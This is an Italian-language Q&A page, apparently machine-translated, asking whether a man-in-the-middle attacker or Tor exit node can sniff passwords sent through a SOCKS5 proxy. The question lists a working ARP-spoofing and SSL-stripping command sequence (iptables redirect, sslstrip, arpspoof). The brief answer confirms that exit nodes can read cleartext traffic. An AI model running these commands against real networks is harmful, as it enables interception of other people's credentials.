Come può un utente malintenzionato annusare una password con il proxy SOCKS5?

Question

Come può un utente malintenzionato annusare una password con il proxy SOCKS5?

#1 da (1 voti)

2

Devo temere un aggressore locale man-in-the-middle mentre inserisco la password con tor?

Dire che una vittima si sta connettendo a Facebook con il browser.

In che modo un utente malintenzionato può creare un attacco man-in-the-middle che ottiene la sua password? (quali comandi precisi)

Se non viene utilizzato alcun proxy, l'autore dell'attacco utilizzerà

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p  tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0  -t < targetIP > < gatewayIP > 
arpspoof -i eth0  -t < gatewayIP > < targetIP>

tor man-in-the-middle arp-spoofing socks5

posta user123456 07.12.2016 - 02:07

fonte

1 risposta

Leggi altre domande sui tag tor man-in-the-middle arp-spoofing socks5

Il malware può essere trasferito da un dispositivo Android a un computer desktop? Lunghezza della chiave TKIP e dimensione del vettore di inizializzazione

score 1 · Answer 1

Ho fatto un post sul blog qui nel 2012: link

Il fatto è che un utente malintenzionato può effettivamente lanciare attacchi come lei menziona. Il nodo di uscita sarà sempre in grado di leggere il traffico del testo in chiaro e forse anche di eseguire attacchi simili a strip SSL.